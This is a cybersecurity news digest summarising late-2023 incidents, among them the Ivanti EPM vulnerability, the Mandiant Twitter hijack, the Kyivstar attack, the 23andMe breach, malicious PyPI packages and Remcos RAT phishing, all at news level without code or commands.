Daily Brief

Ivanti has patched a critical RCE vulnerability in its Endpoint Management (EPM) software that allowed unauthenticated attackers to take over enrolled devices or even the core server. The vulnerability, identified as CVE-2023-39366, affects all supported versions of Ivanti EPM and has been resolved with the release of version 2022 Service Update 5. The security flaw enables attackers within the target's internal network to perform low-complexity, no-privilege attacks, utilizing SQL injection to execute arbitrary SQL queries. Ivanti asserts that there have been no known instances of this vulnerability being exploited against its customers to date. The company has limited public access to the detailed advisory on CVE-2023-39366, possibly to give customers additional time to implement protective measures against potential exploits. The article references previous incidents where state-affiliated hackers exploited two zero-day vulnerabilities in Ivanti’s EPMM software to attack Norwegian government entities, as well as a third zero-day in the company's Sentry software. Ivanti is a key player in the IT asset management space, with its products in use by over 40,000 organizations worldwide.

Mandiant's Twitter account was compromised in a cryptocurrency scam attempt. The account posted about distributing free $PHNTM tokens from a fake website. Mandiant regained control and has launched a thorough investigation into the incident. Criminals mocked Mandiant during the takeover, suggesting they change their password and check bookmarks. The incident adds to a series of high-profile Twitter account hackings, including those of Jeff Bezos, Bill Gates, and Barack Obama in 2020. Vitalik Buterin, Ethereum co-founder, also had his account hacked recently with significant financial losses to followers. The breach is particularly concerning given Mandiant's status as a leading threat intelligence firm owned by Google. CloudSEK reports an increase in Twitter account takeovers and sales, highlighting the risks and potential damage to brand reputation.

Russian hackers infiltrated Kyivstar, Ukraine's largest telecom provider, and executed a devastating cyberattack. The attack, which occurred in December, led to the shutdown of services, impacting approximately 25 million subscribers. The Security Service of Ukraine (SSU) confirmed that the network had been compromised since May 2023, with the hackers gaining full access possibly by November. Thousands of virtual servers and computers were wiped, dealing a severe blow to Kyivstar's operational core. Despite the attack's extensive damage to civilian infrastructure, Ukrainian military communications remained largely unaffected due to different communication protocols. The cyberattack was later claimed by the Russian hacking group Solntsepek, linked to the notorious Sandworm military hackers. The SSU continues to investigate the attack and assess the malware used, while an October report states Russian hackers have targeted multiple Ukrainian telecom networks since May 2023, causing service disruptions.

Cybercriminals are targeting Twitter accounts with "gold" and "grey" checkmarks to promote cryptocurrency scams. Google's subsidiary Mandiant's Twitter account was recently compromised to push a fake airdrop scam. MalwareHunterTeam reported several breaches, including accounts of a Canadian senator, 'The Green Grid' consortium, and a Brazilian politician. Trust inspired by the gold (companies) and grey (government) checkmarks is being exploited by hackers, leading to a rise in scam activities. A black market for selling access to compromised verified accounts has emerged, with prices ranging from $1,200 to $2,000. Threat actors also use dormant corporate accounts to create new "gold" profiles, sometimes selling these for thousands of dollars. CloudSEK advises organizations to shut down inactive accounts, strengthen security settings, and use two-factor authentication.

23andMe experienced a data breach affecting the data of 6.9 million users due to compromised user credentials. The company blames the breach on users reusing passwords that had been compromised in unrelated security incidents. A lawsuit alleges the biotech firm failed to maintain reasonable security measures, which 23andMe denies. The company did not require two-factor authentication (2FA) prior to the breach but claims to have supported it since 2019. Infosec professionals criticize the response, suggesting the company should have had better security practices, like mandatory 2FA and checks for compromised credentials. There is a call within the industry for using services like HaveIBeenPwned to alert users of compromised credentials during account creation. Despite some industry support for the company's stance, the predominant view is that organizations are responsible for securing user data and should not blame users for breaches.

A threat actor has reportedly sold the source code and a cracked version of the Zeppelin ransomware builder for $500 on a hacker forum. The sale was identified by threat intelligence company KELA, though the authenticity of the offered package has not yet been confirmed. The acquisition of the source code could lead to the establishment of a new ransomware-as-a-service (RaaS) operation or development of new malware based on Zeppelin. The seller, known by the handle 'RET,' claimed to have cracked a licensed builder version of Zeppelin but did not create the malware. Despite law enforcement discovering flaws in Zeppelin's encryption scheme leading to a decrypter being built in 2020, the seller asserts the offered version has patched these vulnerabilities. Zeppelin is a derivative of Vega/VegaLocker malware, existing from 2019 to 2022, known for double-extortion tactics and significant ransom demands, previously selling for up to $2,300. In 2022, the FBI alerted the public to a new Zeppelin encryption method involving multiple layers to complicate victim's data recovery.

The FTC is offering a $25,000 prize for ideas to detect and prevent AI-enabled voice cloning, which poses risks of fraud. Voice cloning technology's advancements have sparked concerns about its misuse in acts such as voice phishing and social engineering scams. The Voice Cloning Challenge is part of an effort to proactively address the security threat posed by sophisticated text-to-speech AI systems. While voice cloning can benefit those needing assistive communication tools, its potential for abuse in fraudulent schemes is growing. Potential solutions will be judged on feasibility, impact on corporate accountability, burden on consumer, and adaptability to technological change. The competition is open for submissions until January 12th, with a detailed proposal and optional demonstration video required. If the challenge does not produce viable defenses, the FTC sees it as a warning signal that stricter AI regulations may be necessary.

Orange Spain experienced a massive outage due to an infostealer malware that harvested an employee's admin credentials. The compromised RIPE account had a "ridiculously weak" password ("ripeadmin"), which allowed attackers to disrupt half of the network's traffic. The attack was executed by an individual using the alias "Snow," who hijacked the provider's BGP traffic after breaching the RIPE account. RIPE, lacking mandatory 2FA or MFA and reasonable password policies, made Orange Spain's critical infrastructure particularly vulnerable. The attack led to incorrect routing associations within the network's BGP, resulting in service outages for customers. Despite the service disruption, there was no evidence of customer or client data being compromised. The incident highlights the risk of infostealer malware and poor cybersecurity practices, with experts anticipating potential future similar attacks on other RIPE accounts.

Executive Order on Improving the Nation's Cybersecurity highlights the importance of securing software supply chains, impacting those selling software to federal agencies and beyond. Protecting sensitive information such as API keys and credentials is critical, as shown by high-profile cybersecurity incidents where such data was exposed in plaintext. Tools like GitGuardian can scan code for inadvertently published secrets or prevent such occurrences, aiding in swift remediation and the prevention of future breaches. Building a comprehensive Software Bill of Materials (BOM) using Software Composition Analysis (SCA) tools helps in managing dependencies and vulnerabilities, ensuring transparency in software construction. Ethical hacking, a practice that involves the authorized probing of systems for security weaknesses, is crucial for identifying and mitigating potential exploits before software release. Adopting these proactive security measures and participating in programs like bug bounties can significantly reduce the risk of having to manage incidents post-deployment. Following the SLSA security framework can move software supply chain security "from 'safe enough' to being as resilient as possible," thus reducing post-deployment clean-up and regulatory reporting.

Law enforcement (LE) showcased progress against ransomware in 2023, including the takedown of high-profile gangs such as RagnarLocker, Qakbot, Hive, and partial disruption of AlphV/BlackCat. Despite successful operations by LE, the continued existence and activities of cybercrime groups like AlphV/BlackCat highlight the need for preventative measures beyond takedowns. AlphV/BlackCat, noteworthy for its reprehensible attacks including the leakage of sensitive patient data, still presents an active threat, revealing the limitations of current enforcement strategies. Discussions around combating ransomware with legislation include potentially banning ransom payments and outlawing poor security practices, though these approaches come with complications and may impact victims negatively. The article suggests that accountability and actions on cryptocurrency regulation may disrupt funding to cybercriminals, but current efforts from agencies like the UK's Financial Conduct Authority (FCA) are seen as insufficient. The fight against ransomware requires not just law enforcement actions but also the introduction of decisive policies and legislation by governments to tackle the issue more effectively. The challenge lies in crafting legislation that is effective without jeopardizing the operation of critical services like healthcare institutions, which cannot afford significant downtime. The article underscores the commitment of Western governments in continuing the fight against ransomware, acknowledging LE’s disruption efforts while stressing the need for legislative backing to reinforce and complement these efforts.

Three malicious Python packages were discovered in PyPI targeting Linux systems to deploy cryptocurrency miners. The packages, named modularseven, driftme, and catme, were downloaded 431 times before removal. Malicious code within the packages retrieved cryptocurrency mining scripts from remote servers. The malware operation resembled a previous campaign using a package called culturestreak, using similar domains and hosting strategies. Newer packages included an extra stage in the payload delivery process to avoid detection by security tools. Malicious commands were added to the ~/.bashrc file for persistence, ensuring the malware's continued operation on rebooted devices. The sophisticated evasion techniques highlight the importance of enhanced security measures for open-source repositories.

Four Chinese balloons were observed over the Taiwan Strait, with three crossing over Taiwan and near the island's Ching-Chuan-Kang air base. One balloon, previously shot down in US airspace, reportedly used a US internet provider for navigation and sent data back to China. US after the incident blacklisted six entities linked to China's military and the PLA's aerospace programs. Beijing denied intentional airspace intrusion, yet the Pentagon identified the balloon as having intelligence gathering capabilities. Taiwanese Ministry of Defense monitored accompanying PLA aircraft and PLAN vessels, with ongoing updates due to frequent appearances. The sighting of balloons over Taiwan's landmass is rare, often described as weather monitoring devices, but their purpose this time remains unconfirmed. Tensions rise as the balloon sightings precede Taiwan's presidential and parliamentary elections, amidst increasing CCP rhetoric about "reunification."

The npm package registry experienced a flood of over 3,000 packages during the holidays, creating significant implications for npm authors. A package named "everything" was introduced, scripted to download the entire npm package registry, quickly exhausting a computer's storage. As a consequence of npm’s dependency policy, the existence of "everything" prevented npm authors from removing their packages since they became dependencies for "everything." The package "everything" and its sub-packages created a cumbersome dependency chain that initiated the download of millions of transitive npm packages. The creator of "everything," PatrickJS, apologized for the unintended disruptions his package caused and has reached out to npm admins for a resolution. The npm policy preventing package removal if it's a dependency for others came in response to the "left-pad" incident in 2016 to ensure stability in the programming ecosystem. Even the author of "everything" faces difficulty in removing his packages due to the complex dependency web they created, which ironically is a result of the npm policy designed to prevent such disruptions. Actions were taken to mitigate the situation, with the "@everything-registry" scoped packages linked to "everything" being set to private, presumably to stop the cascade of downloads.

UAC-0050, identified as a threat actor since 2020, is using sophisticated phishing attacks to distribute the Remcos Remote Access Trojan (RAT). Recent attacks involve a new tactic that uses pipe methods for interprocess communication to avoid detection by antivirus and Endpoint Detection and Response (EDR) systems. The group targets Ukrainian and Polish entities using social engineering, often impersonating legitimate organizations to encourage opening malicious attachments. A phishing emails purported to offer consultancy roles with the Israel Defense Forces (IDF) was part of the campaign, primarily targeting Ukrainian military personnel. CERT-UA attributed a phishing campaign to UAC-0050 in Feb 2023, meant for delivering Remcos RAT and occasionally an information stealer named Meduza Stealer. Analysis of a specific LNK file revealed a complex infection process involving staged script execution and downloading additional payloads for persistence and data harvesting. The Remcos RAT has capabilities to extract system data and credentials from various web browsers, further compromising the security of infected systems.

American cybersecurity firm Mandiant's Twitter account was hijacked to promote a cryptocurrency scam. The incident, where the account was renamed and used to impersonate the Phantom crypto wallet service, lasted over six hours. The scam included a fake airdrop promotion that encouraged users to visit a malicious link. It's unclear how the breach occurred, but possibilities include MFA bypass or compromise of Twitter Support staff. Mandiant, a prominent threat intelligence organization, is a subsidiary of Google Cloud following a $5.4 billion acquisition. Mandiant regained control of their Twitter account; the current security status after the incident has not been detailed. The hacker's identity remains unknown, and further details are expected when Mandiant issues a statement.